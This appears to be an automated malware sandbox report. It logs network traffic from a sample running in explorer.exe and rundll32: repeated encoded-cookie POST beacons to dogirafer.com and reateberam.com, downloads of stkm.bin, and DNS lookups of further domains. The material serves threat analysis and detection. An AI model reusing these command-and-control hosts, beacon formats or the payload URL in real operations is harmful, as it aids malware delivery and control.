Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hnYgqczCa1wndZbQ+OUCzeHv2wuiTNZSDQnRHz02mh6/ifwEVsJjYieJqQlQFhBbSp4ONZ656uso19uGMKTT4Y4pL8ZwxOVRsYT1b/oc3OT2Lds2xKacxaoas4xR7ou6vSRzRo9ly1QGSXQIxpW7TudUNGNfWRLCRv+dQZsw==User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hnYQqczCa1wndZbQ+OUCzeHv2wuiTNZSDQnRHz02mh6/ifwEVsJjYieJqQlQFhBbSp4ONZ656uso19uGMKTT4Y4pL8ZwxOVRsYT1b/oc3OT2Lds2xKacxaoas4xR7ou6vSRzRo9ly1QGSXQIxpW7TudUNGNfWRLCRv+dQZsw==User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hnYAqczCa1wndZbQ+OUCzeHv2wuiTNZSDQnRHz02mh6/ifwEVsJjYieJqQlQFhBbSp4ONZ656uso19uGMKTT4Y4pL8ZwxOVRsYT1b/oc3OT2Lds2xKacxaoas4xR7ou6vSRzRo9ly1QGSXQIxpW7TudUNGNfWRLCRv+dQZsw==User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hnZwqczCa1wndZbQ+OUCzeHv2wuiTNZSDQnRHz02mh6/ifwEVsJjYieJqQlQFhBbSp4ONZ656uso19uGMKTT4Y4pL8ZwxOVRsYT1b/oc3OT2Lds2xKacxaoas4xR7ou6vSRzRo9ly1QGSXQIxpW7TudUNGNfWRLCRv+dQZsw==User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hnZgqczCa1wndZbQ+OUCzeHv2wuiTNZSDQnRHz02mh6/ifwEVsJjYieJqQlQFhBbSp4ONZ656uso19uGMKTT4Y4pL8ZwxOVRsYT1b/oc3OT2Lds2xKacxaoas4xR7ou6vSRzRo9ly1QGSXQIxpW7TuY0lAKOKSLzN8upkVsQ8=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: reateberam.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hnZgqczCa1wndZbQ+OUCzeHv2wuiTNZSDQnRHz02mh6/ifwEVsJjYieJqQlQFhBbSp4ONZ656uso19uGMKTT4Y4pL8ZwxOVRsYT1b/oc3OT2Lds2xKacxaoas4xR7ou6vSRzRo9ly1QGSXQIxpW7TuY0lAKOKSLzN8upkVsQ8=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: reateberam.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hnZQqczCa1wndZbQ+OUCzeHv2wuiTNZSDQnRHz02mh6/ifwEVsJjYieJqQlQFhBbSp4ONZ656uso19uGMKTT4Y4pL8ZwxOVRsYT1b/oc3OT2Lds2xKacxaoas4xR7ou6vSRzRo9ly1QGSXQIxpW7TuY0lAKOKSLzN8upkVsQ8=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: reateberam.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hnZAqczCa1wndZbQ+OUCzeHv2wuiTNZSDQnRHz02mh6/ifwEVsJjYieJqQlQFhBbSp4ONZ656uso19uGMKTT4Y4pL8ZwxOVRsYT1b/oc3OT2Lds2xKacxaoas4xR7ou6vSRzRo9ly1QGSXQIxpW7TuY0lAKOKSLzN8upkVsQ8=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: reateberam.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hnawqczCa1wndZbQ+OUCzeHv2wuiTNZSDQnRHz02mh6/ifwEVsJjYieJqQlQFhBbSp4ONZ656uso19uGMKTT4Y4pL8ZwxOVRsYT1b/oc3OT2Lds2xKacxaoas4xR7ou6vSRzRo9ly1QGSXQIxpW7TuY0lAKOKSLzN8upkVsQ8=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: reateberam.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hnagqczCa1wndZbQ+OUCzeHv2wuiTNZSDQnRHz02mh6/ifwEVsJjYieJqQlQFhBbSp4ONZ656uso19uGMKTT4Y4pL8ZwxOVRsYT1b/oc3OT2Lds2xKacxaoas4xR7ou6vSRzRo9ly1QGSXQIxpW7TuY0lAKOKSLzN8upkVsQ8=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: reateberam.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hkYwqczCa1wndZbQ+OUCzeHv2wuiTNZSDQnRHz02mh6/ifwEVsJjYieJqQlQFhBbSp4ONZ656uso19uGMKTT4Y4pL8ZwxOVRsYT1b/oc3OT2Lds2xKacxaoas4xR7ou6vSRzRo9ly1QGSXQIxpW7TuY0lAKOKSLzN8upkVsQ8=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: reateberam.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hkYgqczCa1wndZbQ+OUCzeHv2wuiTNZSDQnRHz02mh6/ifwEVsJjYieJqQlQFhBbSp4ONZ656uso19uGMKTT4Y4pL8ZwxOVRsYT1b/oc3OT2Lds2xKacxaoas4xR7ou6vSRzRo9ly1QGSXQIxpW7TuY0lAKOKSLzN8upkVsQ8=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: reateberam.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hkYQqczCa1wndZbQ+OUCzeHv2wuiTNZSDQnRHz02mh6/ifwEVsJjYieJqQlQFhBbSp4ONZ656uso19uGMKTT4Y4pL8ZwxOVRsYT1b/oc3OT2Lds2xKacxaoas4xR7ou6vSRzRo9ly1QGSXQIxpW7TuY0lAKOKSLzN8upkVsQ8=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: reateberam.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hkYAqczCa1wndZbQ+OUCzeHv2wuiTNZSDQnRHz02mh6/ifwEVsJjYieJqQlQFhBbSp4ONZ656uso19uGMKTT4Y4pL8ZwxOVRsYT1b/oc3OT2Lds2xKacxaoas4xR7ou6vSRzRo9ly1QGSXQIxpW7TuY0lAKOKSLzN8upkVsQ8=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: reateberam.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hkZwqczCa1wndZbQ+OUCzeHv2wuiTNZSDQnRHz02mh6/ifwEVsJjYieJqQlQFhBbSp4ONZ656uso19uGMKTT4Y4pL8ZwxOVRsYT1b/oc3OT2Lds2xKacxaoas4xR7ou6vSRzRo9ly1QGSXQIxpW7TuY0lAKOKSLzN8upkVsQ8=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: reateberam.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hkZgqczCa1wndZbQ+OUCzeHv2wuiTNZSDQnRHz02mh6/ifwEVsJjYieJqQlQFhBbSp4ONZ656uso19uGMKTT4Y4pL8ZwxOVRsYT1b/oc3OT2Lds2xKacxaoas4xR7ou6vSRzRo9ly1QGSXQIxpW7TuY0lAKOKSLzN8upkVsQ8=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: reateberam.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hkZQqczCa1wndZbQ+OUCzeHv2wuiTNZSDQnRHz02mh6/ifwEVsJjYieJqQlQFhBbSp4ONZ656uso19uGMKTT4Y4pL8ZwxOVRsYT1b/oc3OT2Lds2xKacxaoas4xR7ou6vSRzRo9ly1QGSXQIxpW7TuY0lAKOKSLzN8upkVsQ8=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: reateberam.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hkZAqczCa1wndZbQ+OUCzeHv2wuiTNZSDQnRHz02mh6/ifwEVsJjYieJqQlQFhBbSp4ONZ656uso19uGMKTT4Y4pL8ZwxOVRsYT1b/oc3OT2Lds2xKacxaoas4xR7ou6vSRzRo9ly1QGSXQIxpW7TuY0lAKOKSLzN8upkVsQ8=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: reateberam.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hkawqczCa1wndZbQ+OUCzeHv2wuiTNZSDQnRHz02mh6/ifwEVsJjYieJqQlQFhBbSp4ONZ656uso19uGMKTT4Y4pL8ZwxOVRsYT1b/oc3OT2Lds2xKacxaoas4xR7ou6vSRzRo9ly1QGSXQIxpW7TuY0lAKOKSLzN8upkVsQ8=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: reateberam.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hkagqczCa1wndZbQ+OUCzeHv2wuiTNZSDQnRHz02mh6/ifwEVsJjYieJqQlQFhBbSp4ONZ656uso19uGMKTT4Y4pL8ZwxOVRsYT1b/oc3OT2Lds2xKacxaoas4xR7ou6vSRzRo9ly1QGSXQIxpW7TuY0lAKOKSLzN8upkVsQ8=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: reateberam.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hlYwqczCa1wndZbQ+OUCzeHv2wuiTNZSDQnRHz02mh6/ifwEVsJjYieJqQlQFhBbSp4ONZ656uso19uGMKTT4Y4pL8ZwxOVRsYT1b/oc3OT2Lds2xKacxaoas4xR7ou6vSRzRo9ly1QGSXQIxpW7TuY0lAKOKSLzN8upkVsQ8=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: reateberam.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hlYgqczCa1wndZbQ+OUCzeHv2wuiTNZSDQnRHz02mh6/ifwEVsJjYieJqQlQFhBbSp4ONZ656uso19uGMKTT4Y4pL8ZwxOVRsYT1b/oc3OT2Lds2xKacxaoas4xR7ou6vSRzRo9ly1QGSXQIxpW7TuY0lAKOKSLzN8upkVsQ8=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: reateberam.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hlYQqczCa1wndZbQ+OUCzeHv2wuiTNZSDQnRHz02mh6/ifwEVsJjYieJqQlQFhBbSp4ONZ656uso19uGMKTT4Y4pL8ZwxOVRsYT1b/oc3OT2Lds2xKacxaoas4xR7ou6vSRzRo9ly1QGSXQIxpW7TuY0lAKOKSLzN8upkVsQ8=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: reateberam.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hlYAqczCa1wndZbQ+OUCzeHv2wuiTNZSDQnRHz02mh6/ifwEVsJjYieJqQlQFhBbSp4ONZ656uso19uGMKTT4Y4pL8ZwxOVRsYT1b/oc3OT2Lds2xKacxaoas4xR7ou6vSRzRo9ly1QGSXQIxpW7TuY0lAKOKSLzN8upkVsQ8=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: reateberam.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hlZwqczCa1wndZbQ+OUCzeHv2wuiTNZSDQnRHz02mh6/ifwEVsJjYieJqQlQFhBbSp4ONZ656uso19uGMKTT4Y4pL8ZwxOVRsYT1b/oc3OT2Lds2xKacxaoas4xR7ou6vSRzRo9ly1QGSXQIxpW7TuY0lAKOKSLzN8upkVsQ8=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: reateberam.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hlZgqczCa1wndZbQ+OUCzeHv2wuiTNZSDQnRHz02mh6/ifwEVsJjYieJqQlQFhBbSp4ONZ656uso19uGMKTT4Y4pL8ZwxOVRsYT1b/oc3OT2Lds2xKacxaoas4xR7ou6vSRzRo9ly1QGSXQIxpW7TuY0lAKOKSLzN8upkVsQ8=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: reateberam.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hlZQqczCa1wndZbQ+OUCzeHv2wuiTNZSDQnRHz02mh6/ifwEVsJjYieJqQlQFhBbSp4ONZ656uso19uGMKTT4Y4pL8ZwxOVRsYT1b/oc3OT2Lds2xKacxaoas4xR7ou6vSRzRo9ly1QGSXQIxpW7TudUNGNfWRLCRv+dQZsw==User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hlZAqczCa1wndZbQ+OUCzeHv2wuiTNZSDQnRHz02mh6/ifwEVsJjYieJqQlQFhBbSp4ONZ656uso19uGMKTT4Y4pL8ZwxOVRsYT1b/oc3OT2Lds2xKacxaoas4xR7ou6vSRzRo9ly1QGSXQIxpW7TudUNGNfWRLCRv+dQZsw==User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hlawqczCa1wndZbQ+OUCzeHv2wuiTNZSDQnRHz02mh6/ifwEVsJjYieJqQlQFhBbSp4ONZ656uso19uGMKTT4Y4pL8ZwxOVRsYT1b/oc3OT2Lds2xKacxaoas4xR7ou6vSRzRo9ly1QGSXQIxpW7TudUNGNfWRLCRv+dQZsw==User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hlagqczCa1wndZbQ+OUCzeHv2wuiTNZSDQnRHz02mh6/ifwEVsJjYieJqQlQFhBbSp4ONZ656uso19uGMKTT4Y4pL8ZwxOVRsYT1b/oc3OT2Lds2xKacxaoas4xR7ou6vSRzRo9ly1QGSXQIxpW7TudUNGNfWRLCRv+dQZsw==User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hiYwqczCa1wndZbQ+OUCzeHv2wuiTNZSDQnRHz02mh6/ifwEVsJjYieJqQlQFhBbSp4ONZ656uso19uGMKTT4Y4pL8ZwxOVRsYT1b/oc3OT2Lds2xKacxaoas4xR7ou6vSRzRo9ly1QGSXQIxpW7TudUNGNfWRLCRv+dQZsw==User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hiYgqczCa1wndZbQ+OUCzeHv2wuiTNZSDQnRHz02mh6/ifwEVsJjYieJqQlQFhBbSp4ONZ656uso19uGMKTT4Y4pL8ZwxOVRsYT1b/oc3OT2Lds2xKacxaoas4xR7ou6vSRzRo9ly1QGSXQIxpW7TudUNGNfWRLCRv+dQZsw==User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hiYQqczCa1wndZbQ+OUCzeHv2wuiTNZSDQnRHz02mh6/ifwEVsJjYieJqQlQFhBbSp4ONZ656uso19uGMKTT4Y4pL8ZwxOVRsYT1b/oc3OT2Lds2xKacxaoas4xR7ou6vSRzRo9ly1QGSXQIxpW7TudUNGNfWRLCRv+dQZsw==User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hiYAqczCa1wndZbQ+OUCzeHv2wuiTNZSDQnRHz02mh6/ifwEVsJjYieJqQlQFhBbSp4ONZ656uso19uGMKTT4Y4pL8ZwxOVRsYT1b/oc3OT2Lds2xKacxaoas4xR7ou6vSRzRo9ly1QGSXQIxpW7TudUNGNfWRLCRv+dQZsw==User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hiZwqczCa1wndZbQ+OUCzeHv2wuiTNZSDQnRHz02mh6/ifwEVsJjYieJqQlQFhBbSp4ONZ656uso19uGMKTT4Y4pL8ZwxOVRsYT1b/oc3OT2Lds2xKacxaoas4xR7ou6vSRzRo9ly1QGSXQIxpW7TudUNGNfWRLCRv+dQZsw==User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hiZgqczCa1wndZbQ+OUCzeHv2wuiTNZSDQnRHz02mh6/ifwEVsJjYieJqQlQFhBbSp4ONZ656uso19uGMKTT4Y4pL8ZwxOVRsYT1b/oc3OT2Lds2xKacxaoas4xR7ou6vSRzRo9ly1QGSXQIxpW7TudUNGNfWRLCRv+dQZsw==User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hiZQqczCa1wndZbQ+OUCzeHv2wuiTNZSDQnRHz02mh6/ifwEVsJjYieJqQlQFhBbSp4ONZ656uso19uGMKTT4Y4pL8ZwxOVRsYT1b/oc3OT2Lds2xKacxaoas4xR7ou6vSRzRo9ly1QGSXQIxpW7TudUNGNfWRLCRv+dQZsw==User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comContent-Length: 0Cache-Control: no-cache

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Windows\explorer.exe

Code function: 8_2_0303900C InternetOpenW,InternetOpenUrlW,InternetReadFile,InternetCloseHandle,InternetCloseHandle,

8_2_0303900C

Source: global traffic	HTTP traffic detected: GET /files/stkm.bin HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: reateberam.com
Source: global traffic	HTTP traffic detected: GET /files/stkm.bin HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: reateberam.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/stkm.bin HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: reateberam.com

Source: global traffic	DNS traffic detected: DNS query: huanvn.com
Source: global traffic	DNS traffic detected: DNS query: vutarf.com
Source: global traffic	DNS traffic detected: DNS query: reateberam.com
Source: global traffic	DNS traffic detected: DNS query: dogirafer.com

Source: unknown

Source: explorer.exe, 00000008.00000003.3856101577.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3094423766.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4549635767.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.2323476795.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.2323476795.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3094423766.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4549635767.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3856101577.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: explorer.exe, 00000008.00000002.4535485561.0000000000F13000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.2320112731.0000000000F13000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.v
Source: explorer.exe, 00000008.00000003.3856101577.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3094423766.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4549635767.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.2323476795.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.2323476795.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3094423766.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4549635767.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3856101577.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: explorer.exe, 00000008.00000003.3856101577.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3094423766.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4549635767.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.2323476795.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.2323476795.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3094423766.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4549635767.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3856101577.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: explorer.exe, 00000008.00000003.3856101577.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?3880ff7
Source: explorer.exe, 00000008.00000003.3856101577.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3094423766.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4549635767.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.2323476795.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.2323476795.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3094423766.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4549635767.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3856101577.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: explorer.exe, 00000008.00000002.4549635767.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3094423766.00000000099B1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.2323476795.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3856101577.00000000099C0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
Source: rundll32.exe, 00000003.00000002.4535814161.000001CEAE459000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2318890532.000001CEAE459000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.3190095879.000001CEAE459000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4536842943.0000027617D1F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.3190119329.0000027617D1F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2421653008.0000027617D1F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3219518856.000002339E1CA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4536479202.000002339E1CA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2511990228.000002339E1CA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://r10.i.lencr.org/0
